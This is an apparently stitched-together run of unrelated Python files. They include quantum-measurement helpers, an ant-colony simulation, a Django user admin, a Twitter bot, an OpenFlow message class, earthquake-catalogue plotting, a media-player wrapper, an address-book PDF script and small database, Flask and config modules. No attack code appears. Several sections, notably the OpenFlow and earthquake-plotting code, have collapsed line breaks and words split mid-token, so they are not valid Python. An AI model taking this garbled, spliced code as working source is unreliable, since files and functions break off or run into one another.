    Only pairs where BOTH timer values lie inside the thresholds are kept.
    Returns ``(mean, std)``, or ``(nan, nan)`` if no pair qualifies.
    """
    valid = np.logical_and(
        np.logical_and(t[0, :] > min_threshold, t[0, :] < max_threshold),
        np.logical_and(t[1, :] > min_threshold, t[1, :] < max_threshold))
    dt = (t[0, :] - t[1, :])[valid]
    if np.size(dt) > 0:
        return np.mean(dt), np.std(dt)
    return np.nan, np.nan


def prob(t, min_threshold=0, max_threshold=1253):
    """
    Take a switch probability result array from the PreAmp timer, and
    compute switching probability using the specified thresholds.

    Returns ``nan`` for an empty input array (previously this raised
    ZeroDivisionError).
    """
    total = np.size(t)
    if total == 0:
        return np.nan
    switched = np.count_nonzero(
        np.logical_and(t > min_threshold, t < max_threshold))
    return float(switched) / float(total)


def outcomes(t, min_threshold=0, max_threshold=1253):
    """
    Take a switch probability result array from the PreAmp timer, and
    convert it to a numpy array of 0/1 outcomes based on the thresholds.

    Vectorized comparison replaces the previous per-element
    ``np.vectorize`` callback; the result values are identical.
    """
    t = np.asarray(t)
    return np.logical_and(t > min_threshold, t < max_threshold).astype(int)


def corr_coef_from_outcomes(outcomes):
    """
    Compute the correlation coefficient between the two rows of an array
    of switching outcomes.

    Warnings are suppressed because ``np.corrcoef`` warns (and yields nan)
    for constant rows with zero variance.
    """
    with warnings.catch_warnings():
        warnings.simplefilter("ignore")
        return np.corrcoef(outcomes[0, :], outcomes[1, :])[0, 1]


def software_demod(t, freq, Is, Qs):
    """
    Demodulate I and Q data in software. This method uses the ADC
    frequency for demodulation.

    Input:
        t: time vector during which to demodulate data (ns).
        freq: demodulation frequency (GHz).
        Is: I data.
        Qs: Q data.
    Output:
        Id, Qd: demodulated I and Q (means over the time vector).
    """
    demod = 2 * np.pi * t * freq
    Sv = np.sin(demod)
    Cv = np.cos(demod)
    Id = np.mean(Is * Cv - Qs * Sv)
    Qd = np.mean(Is * Sv + Qs * Cv)
    return Id, Qd
from edge import DummyEdgeEnd
from simulation_event import AbstractSimulationEvent
from stats import TripStats


class AbstractAntMove(AbstractSimulationEvent):
    """A simulation event representing one ant traversing one edge.

    ``origin`` and ``destination`` are edge ends of the SAME edge; the ant
    leaves ``origin`` and arrives at ``destination.point`` at ``end_time``,
    dropping ``pheromone_to_drop`` at both ends.
    """

    def __init__(self, ant, origin, destination, end_time, pheromone_to_drop, trip_stats):
        self.ant = ant
        self.origin = origin
        self.destination = destination
        # Sanity check: when both ends are known, they must belong to the
        # same edge (origin may be None for restart moves, see subclass).
        if self.origin is not None and self.destination is not None:
            if self.origin.edge is not None and self.destination.edge is not None:
                #print 'origin', self.origin
                #print 'destination', self.destination
                assert self.origin.edge == self.destination.edge
        self.end_time = end_time
        self.pheromone_to_drop = pheromone_to_drop
        self.trip_stats = trip_stats

    def process_start(self):
        """Drop pheromone at the origin; return the world items changed."""
        self.origin.drop_pheromone(self.pheromone_to_drop)
        return frozenset((self.origin.edge, self.origin.point))

    def process_end(self, reality, stats):
        """Complete the move and schedule the ant's next event.

        Returns ``(next_move, changed)`` where ``changed`` is a frozenset of
        world items whose state was modified.
        """
        changed = [self.destination.edge]
        self.trip_stats.edge_visited(self.destination.edge)
        self.destination.drop_pheromone(self.pheromone_to_drop)
        if not self.destination.point.is_anthill() and self.destination.point.food > 0 and not self.ant.food:
            # ant has found the food: pick up one unit and record the event.
            changed.append(self.destination.point)
            self.trip_stats.food_found()
            self.destination.point.food -= 1
            self.ant.food += 1
            stats.food_found(self.trip_stats)
            stats.present()
        elif self.destination.point.is_anthill():
            # ant has returned to the anthill
            if self.ant.food:
                # with food: deposit it and replace the ant with a fresh one
                # starting over from the anthill (early return).
                changed.append(self.destination.point)
                self.destination.point.food += self.ant.food
                self.trip_stats.back_home()
                new_ant = self.ant.__class__(self.ant.world_parameters)
                return AntRestartMove(new_ant, anthill=DummyEdgeEnd(self.destination.point), end_time=reality.world.elapsed_time), frozenset(changed)
            else:
                # with no food: forget the route and keep wandering below.
                self.trip_stats.reset_route()
        # Ask the ant for its next edge; validate the decision against the
        # edges actually available at this point and the allowed pheromone
        # range, then schedule the next AntMove.
        new_destination_edge, pheromone_to_drop = self.ant.tick(self.destination.point)
        assert new_destination_edge in (end.edge for end in self.destination.point.edge_ends), 'Illegal ant move'
        assert reality.environment_parameters.min_pheromone_dropped_by_ant <= pheromone_to_drop <= reality.environment_parameters.max_pheromone_dropped_by_ant, 'Illegal ant pheromone drop: %s' % (repr(pheromone_to_drop),)
        self.trip_stats.normal_move(new_destination_edge.cost)
        new_destination = new_destination_edge.get_other_end_by_point(self.destination.point)
        origin = new_destination_edge.get_other_end(new_destination)
        end_time = reality.world.elapsed_time + new_destination_edge.cost
        return AntMove(
            ant=self.ant,
            origin=origin,
            destination=new_destination,
            end_time=end_time,
            pheromone_to_drop=pheromone_to_drop,
            trip_stats=self.trip_stats,
        ), frozenset(changed)

    def __repr__(self):
        return '%s@%s' % (self.__class__.__name__, self.end_time,)


class AntRestartMove(AbstractAntMove):
    """Move that (re)inserts an ant at the anthill with fresh trip stats."""

    def __init__(self, ant, anthill, end_time):
        # No origin, no pheromone: the ant simply appears at the anthill.
        super(AntRestartMove, self).__init__(ant, None, anthill, end_time=end_time, pheromone_to_drop=0, trip_stats=TripStats())

    def process_start(self):
        # Nothing to drop and no origin to touch, so nothing changed.
        return frozenset()


class AntStartMove(AntRestartMove):
    """Initial placement of an ant at simulation time zero."""

    def __init__(self, ant, anthill):
        super(AntStartMove, self).__init__(ant, anthill, end_time=0)


class AntMove(AbstractAntMove):
    """An ordinary ant move along an edge (no extra behavior)."""
    pass
'''
from https://docs.djangoproject.com/en/1.7/topics/auth/customizing/#specifying-a-custom-user-model
'''
from django import forms
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from django.contrib.auth.forms import ReadOnlyPasswordHashField
from django.utils.translation import gettext_lazy as _

from custom_user.models import User


class UserCreationForm(forms.ModelForm):
    """
    A form for creating new users. Includes all the required
    fields, plus a repeated password.
    """
    password1 = forms.CharField(label=_('Password'), widget=forms.PasswordInput)
    password2 = forms.CharField(label=_('Password confirmation'), widget=forms.PasswordInput)

    class Meta:
        model = User
        fields = ('email',)

    def clean_password2(self):
        # The two password entries must agree; the confirmation field is
        # the one returned as the cleaned value.
        first = self.cleaned_data.get("password1")
        second = self.cleaned_data.get("password2")
        if first and second and first != second:
            raise forms.ValidationError(_("Passwords don't match"))
        return second

    def save(self, commit=True):
        # Hash the raw password before the user is persisted.
        user = super(UserCreationForm, self).save(commit=False)
        user.set_password(self.cleaned_data["password1"])
        if commit:
            user.save()
        return user


class UserChangeForm(forms.ModelForm):
    """A form for updating users. Includes all the fields on the user,
    but replaces the password field with admin's password hash display
    field.
    """
    password = ReadOnlyPasswordHashField()

    class Meta:
        model = User
        fields = ('email', 'password', 'is_active', 'is_superuser')

    def clean_password(self):
        # Whatever the user typed, keep the stored hash: the read-only
        # widget never carries a real password, and the field itself has
        # no access to the initial value, so it is returned here.
        return self.initial["password"]


class MyUserAdmin(UserAdmin):
    # Plug in the custom add/change forms defined above.
    form = UserChangeForm
    add_form = UserCreationForm

    # Display/filter configuration overriding the base UserAdmin, which
    # references fields that only exist on auth.User.
    list_display = ('email', 'is_superuser')
    list_filter = ('is_superuser',)
    fieldsets = (
        (None, {'fields': ('email','name', 'password', 'family')}),
        ('Permissions', {'fields': ('is_superuser','is_active',)}),
        ('Settings', {'fields': ('language','receive_update_emails','receive_photo_update_emails')}),
    )
    # add_fieldsets is not a standard ModelAdmin attribute; UserAdmin's
    # get_fieldsets consults it when creating a user.
    add_fieldsets = (
        (None, {
            'classes': ('wide',),
            'fields': ('email', 'password1', 'password2')}
        ),
    )
    search_fields = ('email',)
    ordering = ('email',)
    filter_horizontal = ()
    raw_id_fields = ('family',)


# Register the custom User model with its tailored admin.
admin.site.register(User, MyUserAdmin)
# coding: utf-8
# Python 2 script: posts generated phrases to Twitter on a schedule.
__author__ = "@strizhechenko"

import sys
from morpher import Morpher
from twitterbot_utils import Twibot
from apscheduler.schedulers.blocking import BlockingScheduler

# Module-level singletons shared by the scheduled jobs below.
sched = BlockingScheduler()
bot = Twibot()
morphy = Morpher()


def tweets2words(tweets):
    # Join all tweet texts into one string and extract words via Morpher.
    string = " ".join([tweet.text for tweet in tweets])
    return morphy.process_to_words(string)


@sched.scheduled_job('interval', minutes=15)
def do_tweets():
    # Every 15 minutes: pull tweets from the hard-coded Twitter list,
    # turn each extracted word into a phrase and post it.
    print 'New tick'
    words = tweets2words(bot.fetch_list(list_id=217926157))
    for word in words:
        tweet = morphy.word2phrase(word)
        bot.tweet(tweet)
        print 'post', tweet.encode('utf-8')


@sched.scheduled_job('interval', hours=24)
def do_wipe():
    # Once a day: wipe the account's timeline.
    print 'Wipe time'
    bot.wipe()


if __name__ == '__main__':
    # Run one posting cycle immediately; with --test, stop there instead
    # of entering the blocking scheduler loop.
    do_tweets()
    if '--test' in sys.argv:
        exit(0)
    sched.start()
"""Modify Group Entry Message.""" from enum import IntEnum from pyof.foundation.base import GenericMessage from pyof.foundation.basic_types import ( FixedTypeList, Pad, UBInt8, UBInt16, UBInt32) from pyof.v0x04.common.header import Header, Type from pyof.v0x04.controller2switch.common import Bucket __all__ = ('GroupMod', 'GroupModCommand', 'GroupType', 'Group', 'ListOfBuckets') class Group(IntEnum): """Group numbering. Groups can use any number up to attr:`OFPG_MAX`.""" #: Last usable group number. OFPG_MAX = 0xffffff00 #: Fake groups. #: Represents all groups for group delete commands. OFPG_ALL = 0xfffffffc #: Wildcard group used only for flow stats requests. # Select all flows regardless of group (including flows with no group). OFPG_ANY = 0xffffffff class GroupModCommand(IntEnum): """Group commands.""" #: New group. OFPGC_ADD = 0 #: Modify all matching groups. OFPGC_MODIFY = 1 #: Delete all matching groups. OFPGC_DELETE = 2 class GroupType(IntEnum): """Group types. Range [128, 255] is reserved for experimental use.""" #: All (multicast/broadcast) group. OFPGT_ALL = 0 #: Select group. OFPGT_SELECT = 1 #: Indirect group. OFPGT_INDIRECT = 2 #: Fast failover group. OFPGT_FF = 3 class ListOfBuckets(FixedTypeList): """List of buckets. Represented by instances of Bucket. """ def __init__(self, items=None): """Create a ListOfBuckets with the optional parameters below. Args: items (B
ucket): Instance or a list of instances. """ super().__init__(pyof_class=Bucket, items=items) class GroupMod(GenericMessage): """Group setup and teardown (controller -> datapath).""" header = Header(message_type=Type.OFPT_GROUP_MOD) command = UBInt16(enum_ref=GroupModCommand) group_type = UBInt8() #: Pad to 64 bits. pad = Pad(1) group_id = UBInt32() buckets = ListOfBuckets()
def __init__(self, xid=None, command=None, group_type=None, group_id=None, buckets=None): """Create a GroupMod with the optional parameters below. Args: xid (int): Header's transaction id. Defaults to random. command (GroupModCommand): One of OFPGC_*. group_type (GroupType): One of OFPGT_*. group_id (int): Group identifier. buckets (:class:`ListOfBuckets`): The length of the bucket array is inferred from the length field in the header. """ super().__init__(xid) self.command = command self.group_type = group_type self.group_id = group_id self.buckets = buckets
r to be rendered on top (True) or closes the figure for plotting (False) :param list xlim: Lower and upper bounds for x-axis :param list ylim: Lower and upper bounds for y-axis """ if not data: print("No pairs found - abandoning plot!") return fig = plt.figure(figsize=figure_size) keys = list(data.keys()) plt.errorbar(data[keys[0]], data[keys[2]], xerr=data[keys[1]], yerr=data[keys[3]], marker=marker, mfc="b", mec="k", ls="None", ecolor="r") plt.xlabel(utils._to_latex(keys[0]), fontsize=16) plt.ylabel(utils._to_latex(keys[2]), fontsize=16) plt.grid(True) if len(xlim) == 2: lowx = xlim[0] highx = xlim[1] else: lowx = np.floor(np.min(data[keys[0]])) highx = np.ceil(np.max(data[keys[0]])) if len(ylim) == 2: lowy = ylim[0] highy = ylim[1] else: lowy = np.floor(np.min(data[keys[2]])) highy = np.ceil(np.max(data[keys[2]])) if lowy < lowx: lowx = lowy if highy > highx: highx = highy plt.ylim(lowx, highx) plt.xlim(lowx, highx) # Overlay 1:1 line plt.plot(np.array([lowx, highx]), np.array([lowx, highx]), ls="--", color=[0.5, 0.5, 0.5], zorder=1) plt.tight_layout() if filename: utils._save_image(filename, filetype, resolution) if not overlay: plt.show() return data def sample_agency_magnitude_pairs(data, xbins, ybins, number_samples=1): """ """ keys = list(data.keys()) n_data = len(data[keys[0]]) if not number_samples or (number_samples == 1): # Only one sample, return simple histogram #print xbins, ybins return np.histogram2d(np.around(data[keys[0]], 2), np.around(data[keys[2]], 2), bins=[xbins, ybins])[0] elif (np.max(data[keys[1]]) < 1E-15) and (np.max(data[keys[3]]) < 1E-15): # No uncertainty on magnitudes return np.histogram2d(np.around(data[keys[0]], 2), np.around(data[keys[2]], 2), bins=[xbins, ybins])[0] else: counter = np.zeros([len(xbins) - 1, len(ybins) - 1]) for i in range(number_samples): # Sample data sets data_x = data[keys[0]] + data[keys[1]] * np.random.normal(0., 1., n_data) data_y = data[keys[2]] + data[keys[3]] * np.random.normal(0., 1., n_data) counter 
+= np.histogram2d(data_x, data_y, bins=[xbins, ybins])[0] return counter / float(number_samples) def plot_agency_magnitude_density(data, overlay=False, number_samples=0, xlim=[], ylim=[], figure_size=(7, 8), lognorm=True, filetype="png", resolution=300, filename=None): """ Creates a density plot of the earthquakes corresponding to an agency-magnitude combination """ keys = list(data.keys()) if not data: print("No pairs found - abandoning plot!") return if len(xlim) == 2: lowx = xlim[0] highx = xlim[1] else: lowx = np.floor(np.min(data[keys[0]])) highx = np.ceil(np.max(data[keys[0]])) if len(ylim) == 2: lowy = ylim[0] highy = ylim[1] else: lowy = np.floor(np.min(data[keys[2]])) highy = np.ceil(np.max(data[keys[2]])) if lowy < lowx: lowx = lowy if highy > highx: h
ighx = highy xbins = np.linspace(lowx - 0.05, highx + 0.05, ((highx + 0.05 - lowx - 0.05) / 0.1) + 2.0) ybins = np.linspace(lowx - 0.05, highx + 0.05, ((highx + 0.05 - lowx - 0.05) / 0.1) + 2.0) density = sample_agency_magnitude_pairs(data, xbins, ybins, number_samples) fig = plt.figure
(figsize=figure_size) if lognorm: cmap = deepcopy(matplotlib.cm.get_cmap("jet")) data_norm = LogNorm(vmin=0.1, vmax=np.max(density)) else: cmap = deepcopy(matplotlib.cm.get_cmap("jet")) cmap.set_under("w") data_norm = Normalize(vmin=0.1, vmax=np.max(density)) #density[density < 1E-15] == np.nan plt.pcolormesh(xbins[:-1] + 0.05, ybins[:-1] + 0.05, density.T, norm=data_norm, cmap=cmap) cbar = plt.colorbar() cbar.set_label("Number Events", fontsize=16) plt.xlabel(utils._to_latex(keys[0]), fontsize=16) plt.ylabel(utils._to_latex(keys[2]), fontsize=16) plt.grid(True) plt.ylim(lowx, highx) plt.xlim(lowx, highx) # Overlay 1:1 line plt.plot(np.array([lowx, highx]), np.array([lowx, highx]), ls="--", color=[0.5, 0.5, 0.5], zorder=1) plt.tight_layout() if filename: utils._save_image(filename, filetype, resolution) if not overlay: plt.show() return data DEFAULT_SIGMA = {"minimum": lambda x : np.nanmin(x), "maximum": lambda x : np.nanmax(x), "mean": lambda x : np.nanmean(x)} def extract_scale_agency(key): """ Extract the magnitude scale and the agency from within the parenthesis Cases: "Mw(XXX)" or "Mw(XXX) & Mw (YYY)" or "Mw(XXX) & Ms(YYY)" """ # Within parenthesis compiler wip = re.compile(r'(?<=\()[^)]+(?=\))') # Out of parenthesis compiler oop = re.compile(r'(.*?)\(.*?\)') # Get the agencies agencies = wip.findall(key) if len(agencies) == 1: # Simple case - only one agency # Get the scale scale = oop.findall(key) return scale[0], agencies[0] elif len(agencies) > 1: # Multiple agencies agencies = "|".join(agencies) scales = oop.findall(key) # Strip any spaces and '&' nscales = [] for scale in scales: scale = scale.replace("&", "") scale = scale.replace(" ", "") nscales.append(scale) if nscales.count(nscales[0]) == len(nscales): # Same magnitude scale scales = nscales[0] else: # join scales scales = "|".join(nscales) return scales, agencies else: raise ValueError("Badly formatted key %s" % key) class CatalogueRegressor(object): """ Class to perform an orthodonal distance 
regression on a pair of magnitude data tuples :param dict data: Output of agency-magnitude query :param common_catalogue: Catalogue of common events as instance of :class: CatalogueDB :param list keys(): List of keys in the data set :param model: Regression model (eventually as instance of :class: scipy.odr.Model) :param regression_data: Regression data (eventually as instance of :class: scipy.ord.RealData) :param results: Regression results as instance of :class: scipt.odr.Output :param str model_type: Type of model used for regression """ def __init__(self, data, common_catalogue=None): """ Instantiate with data """ self.data = data self.common_catalogue = common_catalogue self.keys = list(self.data.keys()) # Retrieve the scale and agency information from keys self.x_scale, self.x_agency = extract_scale_agency(self.keys[0]) self.y_scale, self.y_agency = extract_scale_agency(self.keys[2]) self.model = None self.regression_data = None self.results = None self.model_type = None self.standard_deviation = None @classmethod def from_catalogue(cls, catalogue, pair1, pair2, no_case=False): """ Class method to instansiate the regression object with the agency- magnitude query parameters :param catalogue: Earthquake catalogue as instance of :class: CatalogueDB :params tuple pair1: Agency and magnitude combination (Agency, Magnitude Type) for defining the independent variable :params tuple pair2:
import socket
from subprocess import Popen, PIPE, STDOUT
import os
import time
import string
import requests
import json
import omxplayer


class UnsupportedFileTypeException(Exception):
    '''Raised if the file type is not among the list of supported types'''
    pass


class FileNotFoundException(Exception):
    '''raised if the file is not valid'''
    pass


class OmxCommsError(Exception):
    '''raised if a command failed to execute'''
    pass


class Omx(object):
    """Playlist-driven wrapper around the external ``omxplayer`` bindings.

    NOTE(review): all player behavior below assumes the OMXPlayer API of
    the imported ``omxplayer`` module (play/pause/stop/duration/position/
    get_source/load) -- confirm against that library.
    """

    def __init__(self):
        # connection attrs
        # private playlist var, stores list of file paths
        # mirrors the list in the player at all times
        self._playlist = []
        self._player = None
        # used to determine if a ... (original comment left unfinished)
        # Supported container extensions checked by check_path().
        # NOTE(review): ".aac" has a leading dot unlike the other entries,
        # so AAC files can never match in check_path() -- likely a bug.
        self.supported = ["mp4", "avi", "mkv", "flv", ".aac", "3gp"]  # add more later
        # creating an instance of the vlc window
        # local socket connection to the vlc player

    @property
    def playlist(self):
        '''returns list of file paths'''
        return self._playlist

    @property
    def connection_open(self):
        # NOTE(review): name suggests a connection check but this reports
        # playback state, and raises AttributeError while _player is None.
        return self._player.is_playing()

    @playlist.setter
    def playlist(self, arg):
        """Takes a string, tuple or a list as an argument and updates the
        player's playlist and the local_playlist variable
        enqueues the vlc object with a playlist of all the files stored in it
        can only add files to the playlist"""
        # NOTE(review): nothing in this class ever appends to
        # self._playlist, and _enqueue() assigns self.playlist again, so a
        # new path re-enters this setter until RecursionError -- verify.
        if isinstance(arg, (list, tuple)):
            for path in arg:
                self.check_path(path)
                if not path in self._playlist:
                    data = self._enqueue(path)
        elif isinstance(arg, str):
            self.check_path(arg)
            if not arg in self._playlist:
                data = self._enqueue(arg)

    @playlist.deleter
    def playlist(self):
        '''clears the local playlist var and the remote one'''
        # NOTE(review): clear() does `del self.playlist`, which invokes this
        # deleter, which calls clear() again -- mutual recursion. Verify.
        self._playlist = []
        self.clear()

    def create_player(self):
        # Instantiate the player on the first playlist entry.
        if self.playlist == []:
            # (message typo "ot" kept -- runtime string)
            raise Exception("The video player has no files ot add")
        else:
            self._player = omxplayer.OMXPlayer(self._playlist[0])

    def check_path(self, path):
        '''Ensures all files added to the application are valid paths.'''
        if not os.path.isfile(path):
            raise FileNotFoundException()
        path, file = os.path.split(path)
        # NOTE(review): split(".") raises ValueError for names containing
        # more than one dot (e.g. "a.b.mp4"); rsplit(".", 1) would not.
        name, ext = file.split(".")
        if ext not in self.supported:
            raise UnsupportedFileTypeException()

    def toggle_fullscreen(self):
        '''For compatibility'''
        return True

    def toggle_loop(self):
        '''for compatibility'''
        return True

    def pause(self):
        """Checks the current state to make sure the player is playing
        something"""
        if self._player:
            self._player.pause()

    def play(self):
        """First checks if a valid file is currently loaded."""
        if self._player:
            self._player.play()

    def stop(self):
        """checks first if there is something to stop"""
        if self._player:
            self._player.stop()

    def _enqueue(self, path):
        '''adds a file to the playlist'''
        self.playlist = path

    def clear(self):
        '''clears all files from the playlist'''
        del self.playlist

    def playlist_loop(self):
        """Get the currently playing video get its remaining time by
        subtracting its current time from its duration and creating a new
        instance for each file"""
        if not self._player:
            self.create_player()
        while True:
            # Poll playback position twice a second.
            time.sleep(0.5)
            remaining = self._player.duration() - self._player.position()
            if remaining < 1:
                current = self._playlist.index(self._player.get_source())
                # NOTE(review): `- 2` makes the second-to-last entry wrap to
                # index 0, skipping the final file; `- 1` looks intended.
                if current < len(self._playlist) - 2:
                    next = self._playlist[current + 1]
                else:
                    next = self._playlist[0]
                self._player.load(next)
# Python 2 script: renders the abook address book (~/.abook/addressbook,
# INI format) as a three-column table in "phello.pdf" via ReportLab,
# starting a new page whenever the initial letter of the surname changes.
from reportlab.platypus import SimpleDocTemplate, Paragraph, Spacer, Table, TableStyle, PageBreak
from reportlab.lib.styles import getSampleStyleSheet
from reportlab.rl_config import defaultPageSize
from reportlab.lib.units import cm
import operator
import os
import ConfigParser
import string

# Parse the abook file; the [format] section is metadata, not a contact.
config = ConfigParser.ConfigParser()
config.read(os.environ["HOME"] + "/.abook/addressbook")
config.remove_section('format')

PAGE_HEIGHT=defaultPageSize[1]; PAGE_WIDTH=defaultPageSize[0]
styles = getSampleStyleSheet()
# Current initial letter; a page break is emitted whenever it changes.
buchstabe = "A"
# NOTE(review): Title/pageinfo (and the operator/string/cm imports) are
# never used below.
Title = "Hello world"
pageinfo = "platypus example"


def Pages(canvas, doc):
    # Page-decoration callback for doc.build(); currently draws nothing.
    canvas.saveState()
    canvas.restoreState()


def go(buchstabe):
    """Build phello.pdf from the parsed config sections.

    Each contact becomes a [name-block, custom3-block, phone/email-block]
    table row; rows are flushed to a Table + PageBreak whenever the
    surname's first letter differs from *buchstabe*.
    """
    doc = SimpleDocTemplate("phello.pdf")
    Story = []
    style = styles["Normal"]
    addresses=[]
    for s in config.sections():
        # nb: name/address block, ub: phone/email block, mb: custom3 block.
        nb=""
        ub=""
        mb=""
        if config.has_option(s,'name'):
            nb = "<b>" + config.get(s,'name') + "</b><br/>"
            worte=config.get(s,'name').split()
            print len(worte)
            # Surname is the second word when present, else the only word.
            if len(worte)<2:
                nachname=worte[0]
            else:
                nachname=worte[1]
            anfangsbuchstabe=nachname[0:1]
            # New initial letter: flush accumulated rows and start a page.
            if anfangsbuchstabe!=buchstabe:
                buchstabe=anfangsbuchstabe
                print buchstabe
                p = Table(addresses)
                p.setStyle(TableStyle([('VALIGN',(0,0),(-1,-1),"TOP"),
                                       ('ALIGN',(0,-1),(0,-1),'RIGHT')]))
                Story.append(p)
                Story.append(PageBreak())
                addresses=[]
        if config.has_option(s,'address'):
            nb = nb + config.get(s,'address') + "<br/>"
        if config.has_option(s,'zip'):
            nb = nb + config.get(s,'zip') + " "
        if config.has_option(s,'city'):
            nb = nb + config.get(s,'city') + "<br/>"
        if config.has_option(s,'state'):
            nb = nb + config.get(s,'state') + " - "
        if config.has_option(s,'country'):
            nb = nb + config.get(s,'country') + "<br/>"
        nb = nb +"<br/>"
        if config.has_option(s,'phone'):
            ub= "Fon: " + config.get(s,'phone') + "<br/>"
        if config.has_option(s,'mobile'):
            ub= ub + "Mobi: " + config.get(s,'mobile') + "<br/>"
        if config.has_option(s,'email'):
            # abook stores multiple addresses comma-separated.
            ub= ub + config.get(s,'email').replace(',','<br/>') + "<br/>"
        ub=ub+"<br/>"
        if config.has_option(s,'custom3'):
            mb= config.get(s,'custom3') + "<br/>"
        mb=mb+"<br/>"
        nameblock = Paragraph(nb,style)
        numberblock = Paragraph(ub,style)
        middleblock = Paragraph(mb,style)
        addresses.append([nameblock,middleblock,numberblock])
    # Flush the final batch of rows.
    p = Table(addresses)
    p.setStyle(TableStyle([('VALIGN',(0,0),(-1,-1),"TOP"),
                           ('ALIGN',(0,-1),(0,-1),'RIGHT')]))
    Story.append(p)
    doc.build(Story, onFirstPage=Pages, onLaterPages=Pages)


go(buchstabe)
import sqlite3


class Database:
    """SQLite-backed store for timestamped JSON message blobs."""

    def __init__(self, dbfile, page_rows=100):
        """Open *dbfile* and create the schema if it does not exist.

        :param dbfile: path to the SQLite file (":memory:" also works).
        :param page_rows: rows returned per page by :meth:`messages`.
        """
        self.dbfile = dbfile
        self.page_rows = page_rows
        # Bind conn to None first so __del__ is safe even if connect()
        # raises below (otherwise __del__ hits an AttributeError).
        self.conn = None
        self.conn = sqlite3.connect(self.dbfile)
        # sqlite3.Row lets callers turn result rows into plain dicts.
        self.conn.row_factory = sqlite3.Row
        cursor = self.conn.cursor()
        cursor.execute(
            "CREATE TABLE IF NOT EXISTS messages "
            "(timestamp TEXT, message TEXT);"
        )
        cursor.execute(
            "CREATE INDEX IF NOT EXISTS messages_timestamp_idx "
            "ON messages (timestamp);"
        )
        self.conn.commit()

    def __del__(self):
        # getattr(): __init__ may have failed before self.conn existed.
        conn = getattr(self, 'conn', None)
        if conn:
            conn.close()
            self.conn = None

    def count(self):
        """Return the total number of stored messages."""
        cursor = self.conn.cursor()
        return cursor.execute("SELECT COUNT(*) FROM messages").fetchone()[0]

    def messages(self, offset=0):
        """Return up to ``page_rows`` messages, newest first, as dicts.

        :param offset: number of rows to skip (for paging).
        """
        cursor = self.conn.cursor()
        rows = cursor.execute(
            "SELECT * FROM messages "
            "ORDER BY timestamp DESC "
            "LIMIT ? "
            "OFFSET ?",
            [self.page_rows, offset]
        ).fetchall()
        return [dict(row) for row in rows]

    def save(self, item):
        """Persist *item* and report whether it was stored.

        Only items whose ``item_type`` is ``'message'`` are saved; the
        timestamp comes from ``item.content['timestamp']`` and the payload
        from ``item.asJson()``.

        :returns: True when a row was inserted, False otherwise.
        """
        saved = False
        if item.item_type == 'message':
            timestamp = item.content['timestamp']
            message = item.asJson()
            cursor = self.conn.cursor()
            cursor.execute(
                "INSERT INTO messages VALUES (?,?)",
                [timestamp, message]
            )
            self.conn.commit()
            saved = True
        return saved
from flask import Flask
from os.path import expanduser


def create_app():
    """Create the Flask application.

    Configuration is loaded from ``~/.directory-tools.py`` and the
    frontend blueprint is attached before the app is returned.
    """
    app = Flask(__name__)

    # Per-user config file, expanded relative to $HOME.
    config_path = expanduser('~/.directory-tools.py')
    app.config.from_pyfile(config_path)

    # Imported here to avoid a circular import at module load time.
    from directory_tools.frontend import frontend
    app.register_blueprint(frontend)

    return app
import array
import operator


class vec(object):
    """Fixed-size numeric vector backed by :class:`array.array`.

    Supports element-wise ``+``, ``-`` and ``*`` between vectors of equal
    size; mismatched sizes raise ``Exception`` (kept generic for backward
    compatibility with existing callers).
    """

    @staticmethod
    def sized(size, type='d'):
        """Return a zero-filled vector of *size* elements of *type*."""
        return vec([0] * size, type)

    @staticmethod
    def of(content, type='d'):
        """Return a vector holding the values of *content*."""
        return vec(content, type)

    def __init__(self, content, type='d'):
        """Build a vector from *content* using array typecode *type*."""
        self.size = len(content)
        self.type = type
        self.array = array.array(type, content)

    def _elementwise(self, other, op, out):
        """Apply binary *op* element-wise against *other*.

        Writes into *out* when given, otherwise allocates a fresh
        zero vector; returns the vector written to.  Shared by
        add/sub/mul, which previously triplicated this body.
        """
        assert isinstance(other, vec)
        # Validate before allocating the result.
        if self.size != other.size:
            raise Exception("size mismatch! %d != %d" % (self.size, other.size))
        result = out if out is not None else vec([0] * self.size, self.type)
        for i in range(self.size):
            result.array[i] = op(self.array[i], other.array[i])
        return result

    def __add__(self, other):
        return self.add(other)

    def add(self, other, out=None):
        """Element-wise sum; *out* receives the result when provided."""
        return self._elementwise(other, operator.add, out)

    def __sub__(self, other):
        return self.sub(other)

    def sub(self, other, out=None):
        """Element-wise difference; *out* receives the result when provided."""
        return self._elementwise(other, operator.sub, out)

    def __mul__(self, other):
        return self.mul(other)

    def mul(self, other, out=None):
        """Element-wise product; *out* receives the result when provided."""
        return self._elementwise(other, operator.mul, out)
# vim: tabstop=4 shiftwidth=4 softtabstop=4

# Copyright (C) 2013 PolyBeacon, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

# Pecan configuration module for the payload API service.

# Server Specific Configurations
server = {
    # Port and bind address for the WSGI server (strings, per Pecan style).
    'port': '9859',
    'host': '0.0.0.0',
}

# Pecan Application Configurations
app = {
    # Dotted path of the root controller class.
    'root': 'payload.api.controllers.root.RootController',
    # Packages Pecan scans for app hooks/configuration.
    'modules': ['payload.api'],
    # %(confdir)s is expanded by Pecan to this config file's directory.
    'static_root': '%(confdir)s/public',
    'template_path': '%(confdir)s/payload/api/templates',
}
#!/usr/bin/env python
"""
    $ python cmdln_main2.py
    This is my shell.
    $ python cmdln_main2.py foo
    hello from foo
"""

import sys
import cmdln


class Shell(cmdln.RawCmdln):
    "This is my shell."
    # Shown by cmdln in help/usage output.
    name = "shell"

    def do_foo(self, argv):
        # Handler for the "foo" subcommand; argv holds the raw arguments.
        print("hello from foo")


if __name__ == "__main__":
    shell = Shell()
    # cmd() runs a single command from the argument vector and returns its
    # exit status (RawCmdln API -- confirm against the cmdln docs).
    retval = shell.cmd(sys.argv[1:])    # just run one command
    sys.exit(retval)
# coding: utf-8
from libs.redis_storage import db1


class User(object):
    """User record stored as a redis hash (Python 2 code: uses iteritems).

    Attribute reads fall back to the cached hash via __getattr__ (missing
    fields come back as None); attribute writes go straight through to
    redis via __setattr__.  NOTE(review): db1 is assumed to be a redis
    client (incr/hmset/hgetall/hset/hincrby usage) -- confirm.
    """

    def __init__(self, **kwargs):
        # Allocate a fresh pk from the redis counter unless one was given.
        pk = kwargs.get('pk') or db1.incr('new_user_id')
